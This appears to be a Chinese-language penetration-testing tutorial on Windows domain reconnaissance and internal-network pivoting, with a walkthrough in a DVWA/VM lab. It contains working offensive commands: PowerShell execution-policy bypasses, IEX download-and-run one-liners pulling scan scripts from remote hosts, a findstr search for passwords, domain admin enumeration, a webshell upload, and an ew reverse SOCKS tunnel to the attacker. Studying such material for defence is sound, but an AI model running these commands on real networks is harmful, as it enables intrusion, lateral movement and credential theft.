域内信息收集2

知识点一:powershell 收集域信息

poershell版本

2.0   win2008和win7

3.0  win2012和win 8

4.0   win2012r2和win8.1

5.0   win2016和win10

常用命令:

查询是否默认可以执行ps脚本:get-executionpolicy

Restricted 不能执行任何脚本

Allsigned  只能执行证书认证的脚本

Unrestricted 可以执行所有的脚本

Remotesigned 本地脚本无限制,但是经过网络的脚本需要签名

更改执行策略为可以执行所有的脚本

命令:set-executionpolicy unrestricted

导入powerview

命令:import-module .\ powerview.ps1

若使用cmd命令:

powershell -exec bypass “import-module C:\PowerSploit-master\PowerSploit-master\Recon\PowerView.ps1;get-netuser”

知识点二:敏感资料、数据,信息收集整理

1.收集敏感信息、核心业务机器

2.各类敏感文件信息收集

3.人事组织结构图

4.基于应用与文件形式的信息收集

dir C:\* .doc /s

findstr /si ‘password’ .txt

知识点三:内网环境的判断及拓扑架构分析

目标主机基本架构的判断

常见的web架构:

  • asp+access+iis5.0/6.0+win2003
  • aspx+mssql+iis7.0/7.5+win2008
  • php+mysql+iis
  • php+mysql+apache
  • php+mysql+nginx
  • jsp+mysql+nginx
  • jsp+mssql+tomcat
  • jsp+oracle+tomcat
  • ………..

内网环境的判断

  • DMZ区
  • 办公区
  • 核心区(生产区)

绘制内网拓扑图

 

域内信息收集

知识点一:判断是否有域

方法一:ipconfig /all

首先在cmd中输入ipconfig /all,可以看到以下内容,可以看到有域

也可以使用nslookup进行反查dns

方法二:systeminfo

在cmd中直接输入systeminfo,可以直接看到有域的信息。

登陆服务器即为域控,后面的名称则为域控的名称。

方法三:net config workstation

方法四:net time /domain(查域控的时候也可以用)

有三种情况:

情况一:存在域,当前用户是域用户

情况二:存在域,当前用户不是域用户

情况三:不存在域

知识点二:域内存活主机探测

推荐:将工具放到C盘中的Windows目录下的temp目录中

方法一:利用netbios快速探测内网

工具:Nbtscan

使用方法:nbtscan.ext IP

方法二:利用ICMP协议探测内网

工具:(注意根据实际情况更改IP地址)

ping命令:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”

vbs脚本:icmb.vbs

 

方法三:利用arp扫描完整探测内网

工具:

1.arp-scan       命令:arp.exe -t IP

2.Invoke-ARPScan.ps1

命令:

我这里因为已经将脚本上传到机器中,所以直接使用第二种命令。

A:远程下载并运行

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.1/Invoke-ARPScan.ps1’);Invoke-ARPScan -CIDR 192.168.1.0/24” >> C:\windows\temp\log.txt

B:本地直接运行

powershell.exe -exec bypass -Command “&{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24}” >> C:\windows\temp\log.txt

C:无条件运行

方法四:利用常规tcp/udp端口扫描探测内网

工具:scanline

命令:scanline.exe -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,5432 -u 53,161,137,139 -O c:\windows\temp\sl_res.txt -p 192.168.1.1-254 /b

知识点三:域内端口扫描

注意:扫描是否会触发IDS

方法一:telnet命令

方法二:s扫描器

在win2003以下会扫描比较快,但是在win2003以上可能会有错误,建议使用tcp扫描

命令:s.exe TCP 192.168.1.1 192.168.1.13 445,3389,80 256 /Banner /save

方法三:metasploit

search portscan

方法四:域内端口扫描

工具:Invoke-portscan.ps1

命令:

powershell.exe -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1’);Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘445,1433,8080,3389,80’ -oA C:\windows\temp\res.txt”

powershell.exe -exec bypass -Command “&{Import-Module C:\windows\temp\Invoke-Portscan.ps1;Invoke-Portscan.ps1;Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘445,1433,8080,3389,80’}” >> C:\windows\temp\log2.txt

 

知识点四:域内基础信息收集

net view /domain

net view /domain:XXX

net group /domain

net group “domain computers” /domain

net accounts /domain

nltest /domain_trusts

知识点五:域控制器的查找

nltest /DCLIST:xxxx

nslookup -type=SRV _ldap._tcp

net time /domain

net group “Domain Controllers” /domain

netdom query pdc

知识点六:域内用户和管理员的获取

查询所有域用户列表

net user /domain

wmic useraccount get /all

dsquery user

net localgroup administrators /domain

查询域管理员用户组

net group “domain admins” /domain

net group “Enterprise Admins” /domain

内网渗透测试环境搭建

背景:

域控DC:windows server 2012 r2       IP地址:192.168.1.1

域内机器1:Windows 7                    IP地址:192.168.1.11

域内机器2:windows server 2003    IP地址:192.168.1.12

网络连接模式均选择host-only模式(仅主机)

 

工具:

virtual BOX

 

搭建开始:

步骤一:分别安装系统Windows server 2012 r2和Windows 7和Windows server 2003

步骤二:设置各机器的IP地址

步骤三:更改计算机名称,注意:更改完成名称之后会重启计算机

步骤四:安装域控制器和DNS服务(关键)

步骤五:创建Active Directory用户

步骤六:将windows 7添加进域中

步骤七:将Windows server 2003添加进域

到此为止呢,已经创建了域控,并将win7和win2003添加进了域中。

内网渗透初探(一)

背景:

攻击机IP:192.168.0.4

web服务器IP:192.168.0.217和10.1.0.5

内网机器IP:10.1.0.4

目标:拿到内网机器10.1.0.4的webshell

注意:

1.攻击机可以直接ping通192.168.0.217,但是无法ping通10.1.0.5

2.攻击机无法ping通10.1.0.4

工具:

中国蚁剑,浏览器,ew,SocksCap

 

步骤一:

拿到web服务器的webshell,这里使用的是dvwa上传漏洞直接上传。

步骤二:将web服务器作为代理机(跳板机)

首先需要将ew工具上传至web服务器

攻击机输入命令:ew_for_Win.exe -s rcsocks -l 1008 -e 888

web服务器输入命令:ew_for_Win.exe -s rssocks -d 192.168.0.4 -e 888

建立完成之后会发现下图框中的内容

步骤三:渗透内网机器10.1.0.4

为了作为对比,首先在无代理的情况下浏览器访问10.1.0.4,可以发现无法访问

然后使用SocksCap进行代理设置:127.0.0.1     1008    socks5

然后检测代理是否成功:

添加浏览器到代理程序中,并打开

访问10.1.0.4

然后继续利用dvwa的上传漏洞上传webshell

将中国蚁剑添加进代理软件程序中,并打开,然后添加webshell

可以直接访问dvwa的配置文件,获取数据库信息

然后利用中国蚁剑的数据库功能,可以看到数据库是root权限

完成本次渗透!